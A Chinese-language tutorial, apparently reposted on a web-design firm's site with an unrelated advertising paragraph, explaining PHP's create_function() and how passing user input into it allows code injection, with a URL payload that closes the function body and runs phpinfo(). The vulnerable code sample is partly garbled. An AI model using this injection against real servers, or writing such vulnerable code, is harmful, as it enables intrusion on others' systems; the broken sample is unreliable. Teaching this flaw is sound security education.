PHPcreate_function()代码注入

第一部分:介绍php函数 create_function():

创新互联建站专注于企业成都营销网站建设、网站重做改版、白银区网站定制设计、自适应品牌网站建设、html5购物商城网站建设、集团公司官网建设、成都外贸网站建设公司、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为白银区等各大城市提供网站开发制作服务。

string create_function    ( string $args   , string $code   )

string $args变量部分

string $code 方法代码部分

举例:

create_function('$fname','echo $fname."Zhang"')

类似于:

function fT($fname) {
  echo $fname."Zhang";
}

举一个官方提供的例子:

第二部分:如何利用create_function()代码注入

测试环境版本:

apache +php 5.2、apache +php 5.3

有问题的代码:

";
echo "==============================";
echo "
"; $f1 = create_function('$a',$str2); echo "
"; echo "=============================="; ?>

利用方法:

http://localhost/libtest/02-8.php?id=2;}phpinfo();/*

实现原理:

由于id=2;}phpinfo();/*

执行函数为:

源代码:
function fT($a) {
  echo "test".$a;
}

注入后代码:
function fT($a) {
  echo "test";}
  phpinfo();/*;//此处为注入代码。
}

测试效果:

PHP create_function()代码注入


本文名称:PHPcreate_function()代码注入
网页链接:http://ybzwz.com/article/pdpcos.html